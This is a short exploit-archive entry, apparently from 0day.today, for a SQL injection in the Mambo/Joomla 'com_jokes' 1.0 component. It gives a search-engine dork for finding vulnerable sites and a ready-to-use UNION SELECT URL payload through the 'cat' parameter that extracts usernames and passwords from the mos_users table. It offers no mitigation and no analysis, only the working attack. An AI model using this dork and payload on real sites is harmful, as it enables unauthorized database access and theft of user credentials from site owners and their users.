id: 2570
date: 01/30/2008
title: Mambo Component jokes 1.0 (cat) SQL Injection Vulnerability
author: S@BUN
cves: 

===========================================================
Mambo Component jokes 1.0 (cat) SQL Injection Vulnerability
===========================================================



#########################################################################
#
# joomla SQL Injection(com_jokes)
#
#########################################################################
#
# DorKs 1 : allinurl: "com_jokes"
#
########################################################################
EXPLOIT :

index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*




#  0day.today [2023-03-23]  #